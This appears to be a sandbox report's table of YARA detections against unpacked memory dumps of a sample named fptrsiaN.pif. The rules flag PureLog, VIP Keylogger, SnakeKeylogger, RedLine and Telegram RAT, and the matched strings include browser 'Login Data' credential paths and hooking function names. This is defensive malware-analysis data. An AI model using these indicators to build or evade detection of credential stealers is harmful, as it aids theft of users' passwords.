6.3.fptrsiaN.pif.1b2ec7f8.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
6.3.fptrsiaN.pif.1b2ec7f8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
6.3.fptrsiaN.pif.1b2ec7f8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
6.3.fptrsiaN.pif.1b2ec7f8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
15.2.fptrsiaN.pif.33bf0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.33bf0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.33bf0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.33bf0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.33bf0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
15.2.fptrsiaN.pif.33bf0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
15.2.fptrsiaN.pif.33bf0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.fptrsiaN.pif.1ff40000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1ff40000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.fptrsiaN.pif.1ff40000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1ff40000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.fptrsiaN.pif.1ff40000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1ff40000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1ff40000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f95a:$a1: get_encryptedPassword 0x3f92e:$a2: get_encryptedUsername 0x3f9f2:$a3: get_timePasswordChanged 0x3f90a:$a4: get_passwordField 0x3f970:$a5: set_encryptedPassword 0x3f73d:$a7: get_logins 0x3adb8:$a10: KeyLoggerEventArgs 0x3ad87:$a11: KeyLoggerEventArgsEventHandler 0x3f811:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4aa88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a12b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a388:$a4: \Orbitum\User Data\Default\Login Data 0x4ad67:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d50d:$s1: UnHook 0x3d4a9:$s2: SetHook 0x3d4e2:$s3: CallNextHook 0x3d471:$s4: _hook
6.2.fptrsiaN.pif.1ce5ac4e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1ce5ac4e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.fptrsiaN.pif.1ce5ac4e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1ce5ac4e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.fptrsiaN.pif.1ce5ac4e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1ce5ac4e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1ce5ac4e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
10.2.fptrsiaN.pif.21b59d46.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.21b59d46.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.21b59d46.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.21b59d46.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.21b59d46.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3db5a:$a1: get_encryptedPassword 0x3db2e:$a2: get_encryptedUsername 0x3dbf2:$a3: get_timePasswordChanged 0x3db0a:$a4: get_passwordField 0x3db70:$a5: set_encryptedPassword 0x3d93d:$a7: get_logins 0x38fb8:$a10: KeyLoggerEventArgs 0x38f87:$a11: KeyLoggerEventArgsEventHandler 0x3da11:$a13: _encryptedPassword
10.2.fptrsiaN.pif.21b59d46.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48c88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4832b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48588:$a4: \Orbitum\User Data\Default\Login Data 0x48f67:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.21b59d46.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b70d:$s1: UnHook 0x3b6a9:$s2: SetHook 0x3b6e2:$s3: CallNextHook 0x3b671:$s4: _hook
15.2.fptrsiaN.pif.30c0ac4e.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.30c0ac4e.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.30c0ac4e.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.30c0ac4e.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.30c0ac4e.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
15.2.fptrsiaN.pif.30c0ac4e.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
15.2.fptrsiaN.pif.30c0ac4e.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
15.2.fptrsiaN.pif.335a0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.335a0000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.335a0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.335a0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.335a0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f95a:$a1: get_encryptedPassword 0x3f92e:$a2: get_encryptedUsername 0x3f9f2:$a3: get_timePasswordChanged 0x3f90a:$a4: get_passwordField 0x3f970:$a5: set_encryptedPassword 0x3f73d:$a7: get_logins 0x3adb8:$a10: KeyLoggerEventArgs 0x3ad87:$a11: KeyLoggerEventArgsEventHandler 0x3f811:$a13: _encryptedPassword
15.2.fptrsiaN.pif.335a0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4aa88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a12b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a388:$a4: \Orbitum\User Data\Default\Login Data 0x4ad67:$a5: \Kometa\User Data\Default\Login Data
15.2.fptrsiaN.pif.335a0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d50d:$s1: UnHook 0x3d4a9:$s2: SetHook 0x3d4e2:$s3: CallNextHook 0x3d471:$s4: _hook
15.2.fptrsiaN.pif.33bf0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.33bf0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.33bf0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.33bf0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.33bf0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
15.2.fptrsiaN.pif.33bf0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
15.2.fptrsiaN.pif.33bf0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
15.2.fptrsiaN.pif.335a0f08.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.335a0f08.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.335a0f08.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.335a0f08.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.335a0f08.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
15.2.fptrsiaN.pif.335a0f08.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
15.2.fptrsiaN.pif.335a0f08.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
1.2.x.exe.213963a8.6.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x38eb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x39530:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
10.2.fptrsiaN.pif.24330000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.24330000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.24330000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.24330000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.24330000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
10.2.fptrsiaN.pif.24330000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.24330000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
6.1.fptrsiaN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
10.2.fptrsiaN.pif.242d0f08.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.242d0f08.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.242d0f08.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.242d0f08.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.242d0f08.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
10.2.fptrsiaN.pif.242d0f08.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.242d0f08.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
6.2.fptrsiaN.pif.1ff40000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1ff40000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.fptrsiaN.pif.1ff40000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1ff40000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.fptrsiaN.pif.1ff40000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1ff40000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1ff40000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
10.2.fptrsiaN.pif.242d0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.242d0000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.242d0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.242d0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.242d0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f95a:$a1: get_encryptedPassword 0x3f92e:$a2: get_encryptedUsername 0x3f9f2:$a3: get_timePasswordChanged 0x3f90a:$a4: get_passwordField 0x3f970:$a5: set_encryptedPassword 0x3f73d:$a7: get_logins 0x3adb8:$a10: KeyLoggerEventArgs 0x3ad87:$a11: KeyLoggerEventArgsEventHandler 0x3f811:$a13: _encryptedPassword
10.2.fptrsiaN.pif.242d0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4aa88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a12b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a388:$a4: \Orbitum\User Data\Default\Login Data 0x4ad67:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.242d0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d50d:$s1: UnHook 0x3d4a9:$s2: SetHook 0x3d4e2:$s3: CallNextHook 0x3d471:$s4: _hook
